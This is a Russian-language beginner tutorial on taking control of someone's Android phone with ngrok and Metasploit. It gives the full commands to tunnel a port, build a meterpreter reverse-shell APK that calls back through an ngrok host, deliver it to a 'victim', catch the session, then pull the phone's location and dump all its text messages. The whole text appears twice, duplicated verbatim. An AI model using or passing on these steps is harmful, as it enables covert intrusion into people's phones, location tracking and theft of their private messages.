Простенькая статья для новичков для улучшения понимания процесса получения контроля над удаленный девайсом. Речь пойдёт от ngrok и metasploit, и как можно взломать телефон и захватить управление
Сначала зайдите на сайт Ngrok и создайте там аккаунт. После этого скачиваем сам ngrok.
Затем выкидываем его на рабочий стол и пишем: ngrok-stable-linux-amd64.zip
И пишем ./ngrok authtoken <TOKEN>
Прописываем в терминале ./ngrok tcp 4444
Кстати, если у вас белый IP адрес, то Ngrok'ом можно не пользоваться.
Теперь нам надо уже пойти к создания нашего пейлоада для телефона.
Для этого нам поможет msfvenom, для этого мы в новой консоле пишем:
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10612 R > payload.apk
Если ты не используешь Ngrok, то в поле LHOST вписываешь свой ip адрес, а в поле LPORT ставишь 4444
Вот сам пейлоад готов, теперь мы должны кинуть его жертве.
Теперь нам надо узнать ип, если вы на кали то командой "ipconfig", а если как и я на арч то "ip a".
Ну а дальше в бой пойдет сам метасплоит, он предустановлен в kali linux).
Чтобы его запустить надо просто написать в консоле msfconsole.
И уже там пишем:
msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST localhost
set LPORT 4444
exploit
После чего жертва запустит наш пайлоад, и у нас откроется сессия.
Теперь у нас есть доступ к телефону жертвы.
Давайте узнаем текущую геолокацию: geolocate
Также можно сделать дамп всех смс, командой: sms_dump
Данными действиями мы произвели подключение к телефону, и у нас есть полный набор возможностей дальнейших действий с ним.
Сначала зайдите на сайт Ngrok и создайте там аккаунт. После этого скачиваем сам ngrok.
Затем выкидываем его на рабочий стол и пишем: ngrok-stable-linux-amd64.zip
И пишем ./ngrok authtoken <TOKEN>
Прописываем в терминале ./ngrok tcp 4444
Кстати, если у вас белый IP адрес, то Ngrok'ом можно не пользоваться.
Теперь нам надо уже пойти к создания нашего пейлоада для телефона.
Для этого нам поможет msfvenom, для этого мы в новой консоле пишем:
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10612 R > payload.apk
Если ты не используешь Ngrok, то в поле LHOST вписываешь свой ip адрес, а в поле LPORT ставишь 4444
Вот сам пейлоад готов, теперь мы должны кинуть его жертве.
Теперь нам надо узнать ип, если вы на кали то командой "ipconfig", а если как и я на арч то "ip a".
Ну а дальше в бой пойдет сам метасплоит, он предустановлен в kali linux).
Чтобы его запустить надо просто написать в консоле msfconsole.
И уже там пишем:
msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST localhost
set LPORT 4444
exploit
После чего жертва запустит наш пайлоад, и у нас откроется сессия.
Теперь у нас есть доступ к телефону жертвы.
Давайте узнаем текущую геолокацию: geolocate
Также можно сделать дамп всех смс, командой: sms_dump
Данными действиями мы произвели подключение к телефону, и у нас есть полный набор возможностей дальнейших действий с ним.
